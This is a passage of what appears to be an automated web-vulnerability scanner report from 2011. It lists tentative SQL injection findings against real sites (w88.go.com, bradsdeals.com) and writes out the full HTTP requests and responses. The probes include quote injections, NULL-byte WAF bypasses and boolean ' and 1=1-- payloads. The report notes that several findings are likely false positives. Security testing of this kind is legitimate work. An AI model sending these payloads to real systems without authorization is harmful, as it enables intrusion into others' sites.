document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid ...[SNIP]...
1.30. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://w88.go.com |
| Path: | /b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that in this case both responses are HTTP 404 Not Found from the Omniture DC server: the "general error message" in Response 1 is a generic Not Found page and Response 2 is an empty 404, so the difference is a tentative indicator only until it has been confirmed manually.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/wdgabccom,wdgasec%00'/1/H.16/s3647485188674?[AQB]&ndh=1&t=17/8/2011%200%3A58%3A52%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Aindex&g=http%3A//beta.abc.go.com/shows/charlies-angels&r=http%3A//s0.2mdn.net/1249573/CA_300x600.swf&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v16=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&c27=Unknown&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1 Host: w88.go.com Proxy-Connection: keep-alive Referer: http://beta.abc.go.com/shows/charlies-angels User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; 
s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B
Response 1
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:16:10 GMT Server: Omniture DC/2.0.0 Content-Length: 410 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/wdgabccom,wdgasec was not found on this server. ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/wdgabccom,wdgasec%00''/1/H.16/s3647485188674?[AQB]&ndh=1&t=17/8/2011%200%3A58%3A52%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Aindex&g=http%3A//beta.abc.go.com/shows/charlies-angels&r=http%3A//s0.2mdn.net/1249573/CA_300x600.swf&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v16=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&c27=Unknown&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1 Host: w88.go.com Proxy-Connection: keep-alive Referer: http://beta.abc.go.com/shows/charlies-angels User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; 
s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B
Response 2
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:16:10 GMT Server: Omniture DC/2.0.0 xserver: www661 Content-Length: 0 Content-Type: text/html
1.31. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://w88.go.com |
| Path: | /b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with the other w88.go.com entries, both responses here are HTTP 404 Not Found (one with a generic Not Found page, one with an empty body), which is weak evidence of database interaction on its own.
Request 1
GET /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1 Host: w88.go.com Proxy-Connection: keep-alive Referer: http://beta.abc.go.com/shows/charlies-angels/bios User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 
SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B
Response 1
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:26:47 GMT Server: Omniture DC/2.0.0 Content-Length: 434 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 was n ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b''/ss/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1 Host: w88.go.com Proxy-Connection: keep-alive Referer: http://beta.abc.go.com/shows/charlies-angels/bios User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 
SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B
Response 2
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:26:47 GMT Server: Omniture DC/2.0.0 xserver: www600 Content-Length: 0 Content-Type: text/html
1.32. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://w88.go.com |
| Path: | /b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Here too, both responses are HTTP 404 Not Found from the Omniture DC server (a generic Not Found page versus an empty body), so manual confirmation is needed before treating this as a real finding.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss%00'/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1 Host: w88.go.com Proxy-Connection: keep-alive Referer: http://beta.abc.go.com/shows/charlies-angels/bios User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 
SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B
Response 1
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:27:05 GMT Server: Omniture DC/2.0.0 Content-Length: 392 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss%00''/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1 Host: w88.go.com Proxy-Connection: keep-alive Referer: http://beta.abc.go.com/shows/charlies-angels/bios User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 
SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B
Response 2
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:27:05 GMT Server: Omniture DC/2.0.0 xserver: www596 Content-Length: 0 Content-Type: text/html
1.33. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.bradsdeals.com |
| Path: | /dealsoftheday/subscribe/b |
Issue detail
The s parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the s parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case, Response 1 carries the X-dotDefender-denied: 1 header and a "This request has been blocked" page, so the difference between the two responses is explained by the web application firewall blocking the first payload rather than necessarily by any change in query results.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d1--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 Denied Content-Type: text/html Server: Microsoft-IIS/7.0 X-dotDefender-denied: 1 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:35:56 GMT Connection: close Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Your request has been blocked</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <meta name="robots" content="noindex, nofollow, noarchive"/> <style type="text/css"> body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4} </style> </head> <body> <div id="box"> <span id="datetime">16-Sep-11</span> <h1>This request has been blocked.</h1><br/> <div id="message">Please contact the site administrator, and provide the following Reference ID:</div> <div id="refid">D43C-B4C8-D45E-AE50</div> </div> </body> </html>
Request 2
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d2--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/7.0 Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/ X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:35:56 GMT Content-Length: 23948
<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8">
